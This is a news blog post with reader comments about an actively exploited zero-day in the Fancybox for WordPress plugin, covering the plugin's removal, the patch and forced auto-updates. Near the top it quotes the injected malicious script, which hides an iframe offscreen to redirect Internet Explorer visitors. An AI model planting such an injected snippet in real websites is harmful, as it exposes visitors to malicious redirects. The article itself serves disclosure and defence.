Zero Day Vulnerability Discovered in Fancybox for WordPress Plugin

Four hours ago, users seeking support on reported malware injected into their sites from an unknown source. The vulnerability allows for an iframe to be injected, redirecting to a “203koko” site.

[html light=”true”]
<script>/*<![CDATA[*/if(navigator.userAgent.match(/msie/i)){document.write(‘ <div style="position:absolute;left:-2000px;width:2000px"><iframe src="" width="20" height="30" ></iframe></div>’);}/*]]>*/</script>

After working together to determine the plugins they have in common, users identified Fancybox for WordPress as the culprit. It has since been temporarily removed from the WordPress Plugins Directory, as it hasn’t been updated for two years and poses a security threat to users. The plugin has received more than half a million downloads and is likely in use on thousands of WordPress sites.

Konstantin Kovshenin and Gennady Kovshenin worked together to analyze sites from affected users to confirm the vulnerability. There is currently no patch, so users of the plugin are advised to turn it off immediately.

Analysts at Sucuri have confirmed via Website Firewall logs that the vulnerability is being actively exploited:

After some analysis, we can confirm that this plugin has a serious vulnerability that allows for malware (or any random script/content) to be added to the vulnerable site. Because it is currently unpatched, we will not disclose more information.

What makes things worse, is that it’s being actively exploited in the wild, leading to many compromised websites.

Users who have this plugin installed on their sites have no other option than to disable it, as no patch is available yet. The plugin’s author, José Pardilla, is aware of the issue and responded to an affected user five hours ago in the plugin’s forum on A patch should be forthcoming.


18 responses to “Zero Day Vulnerability Discovered in Fancybox for WordPress Plugin”

  1. Thank you Sarah! I have the odd feeling this might be affecting themes with fancybox built in as well.

    By the way, I think Google is going to flag the email version of this article… and maybe the article itself… for containing that code. Gmail gave me a nastygram about it.

    • In case there is any confusion here, this appears to be a flaw in the FancyBox for WordPress plugin, not in FancyBox itself. which is just a jQuery plugin.

      That seems to be a widespread misunderstanding as I’m getting some questions about security of my plugin (Easy FancyBox) because of this… Hope it is clear this particular vulnerability does not necessarily concern other FancyBox plugins.

  2. Thanks for letting everyone know about this, we have been busily checking all our sites to see if any use it, but it would be nice if the WordPress plugin repository gave an indication of why it was pulled (for anyone stumbling upon it), and even sites using it, send a notice to the plugin menu like an upgrade notification.

  3. The author has already pushed out a newer version 3.0.3. In the changelog it reflects the needed fixes. “3.0.3 Fixed a security issue. (Thanks to mickaelb for reporting and Konstantin Kovshenin for providing the fix).

  4. I had 4 sites with this plugin… is there any way to check if the site was already exploited?

    Interesting, but my logs show that Fancybox update was pushed from (that means it was installed automatically without my interaction). I didn’t know about this WP feature, or is it some kind of “last resort” feature that only gets used once in a while?

  5. You can clear cache to be sure as nicola mentioned and check the source code of your site inside your head tag. The malicious code was injected near the line that reads ““, and it looked like the code mentioned at the beginning of this article.

    The auto update was set on automatic mode by the security team to help mitigate the effects of the vulnerability. The version that is auto-updating to fixes the issue and changes the name of the setting where the malicious code was stored, so if your site got infected, the update should clear it.

    • “The auto update was set on automatic mode by the security team”
      I am very curious to know what exactly was done, and how. It looks like very site that had this plugin had all its themes and plugins auto updated? I know how this can be enabled per-site, but how exactly did these updated get pushed?

      • I’m not entirely sure how it works but to my understanding Auto Updates for plugins and themes are a (disabled by default) built-in feature on WordPress installations. The Security team can override this and force an update for a particular plugin if they decide it’s worth doing so, such as in this case, or when the Jetpack vulnerability was found last year.

        The link you posted describes how to enable these auto-updates on your own WordPress installation if desired, although normally this shouldn’t be necessary, since manually updating them gives you a better chance at testing and checking the update doesn’t break them, or at least find out it that happens.

  6. Administrators who had the vulnerable version of this plugin installed should also consider resetting their user sessions and credentials. The patch issued yesterday closes the exploit vector within the plugin, but depending on how an attacker chose to exploit the vulnerability, it could have lead to compromised user credentials or arbitrary code execution in the admin panel (this would have been a separate attack than the iframe being reported here).

  7. Also note to those of you who are using Wordfence, they’re currently scanning files for the 203koko URL and reporting it as a threat. However caching plugins like WTC will cache blogrolls and Dashboard news feeds. This article was features in the news feed and contains the 203koko URL in the body. This content is being cached to flatfiles which are scanned by Wordfence. Such cases are false positives.

  8. I had the same warning via wordfence, but was not using fancybox! seems your live link in this post gave wordfence a false positive as the link was showing up in wordpress news section might be an idea to remove actual link? Thanks to Gennady Kovshein for clearing this up for my particular case! Hope this helps others before they go ahead & delete server files to re install like I just have :(


Subscribe Via Email

Enter your email address to subscribe to this blog and receive notifications of new posts by email.